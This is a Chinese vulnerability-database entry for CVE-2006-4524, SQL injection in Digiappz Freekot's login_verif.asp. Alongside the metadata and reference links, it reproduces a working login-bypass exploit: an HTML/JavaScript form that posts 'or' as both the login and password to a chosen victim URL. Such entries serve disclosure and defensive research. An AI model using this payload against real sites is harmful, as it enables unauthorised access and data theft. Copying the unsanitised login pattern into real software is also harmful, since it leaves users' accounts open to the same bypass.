Digiappz Freekot 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110923 漏洞类型 SQL注入
发布时间 2006-08-30 更新时间 2008-12-04
CVE编号 CVE-2006-4524 CNNVD-ID CNNVD-200609-001
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28443
https://www.securityfocus.com/bid/19768
https://cxsecurity.com/issue/WLB-2006090016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-001
|漏洞详情
DigiappzFreekot的login_verif.asp中存在多个SQL注入漏洞,远程攻击者可以通过(1)login或(2)password参数执行任意SQL命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/19768/info

Digiappz Freekot is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit could allow an attacker to compromise the application, retrieve sensitive information, or modify data; other consequences are possible as well.

<html> <head><title>KAPDA :: Freekot SQL-Injection Vulnerability , Login bypass exploit </title></head> <body bgcolor="black"> <script language="JavaScript"> function egxpl() { if (document.xplt.victim.value=="") { alert("Please enter victim site!"); return false; } if (confirm("Are you sure?")) { xplt.action=document.xplt.victim.value+"/login_verif.asp"; xplt.login.value=document.xplt.login.value; xplt.password.value=document.xplt.password.value; xplt.submit(); } } </script><font face=Verdana size=2 color="#00FF00"><center><b>KAPDA :: Freekot SQL-Injection Vulnerability<br> Discovered and coded by FarhadKey From KAPDA.IR<br> Special Thx to Hessam-x From Anti-Security.net (Hackerz.ir)<br></b> <form name="xplt" method="post" onsubmit="egxpl();"> <br>Victim Path : (insert http:// for path)<br> <input type="text" name="victim" value="http://www.victim.com/FreeKot_Path/" size="44" class="xpl" style="color: #00FF00; background-color: #000000"><br> <input type="hidden" name="login" value="'or'"> <input type="hidden" name="password" value="'or'"><br> <!-- Discovered and coded by FarhadKey . Kapda.ir --> <input type="submit" value="GO !!!" style="color: #00FF00; background-color: #000000"> </form></body></html>
|受影响的产品
Digiappz Freekot 1.01 Digiappz Freekot 0
|参考资料

来源:XF
名称:freekot-login-password-sql-injection(28672)
链接:http://xforce.iss.net/xforce/xfdb/28672
来源:BID
名称:19768
链接:http://www.securityfocus.com/bid/19768
来源:BUGTRAQ
名称:20060830[KAPDA::#56]-FREEKOTSQLInjectionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/444752/100/0/threaded
来源:MISC
链接:http://www.kapda.ir/attach-1996-xpl_freekot.htm
来源:MISC
链接:http://www.kapda.ir/advisory-410.html
来源:SECUNIA
名称:21669
链接:http://secunia.com/advisories/21669
来源:SREASON
名称:1488
链接:http://securityreason.com/securityalert/1488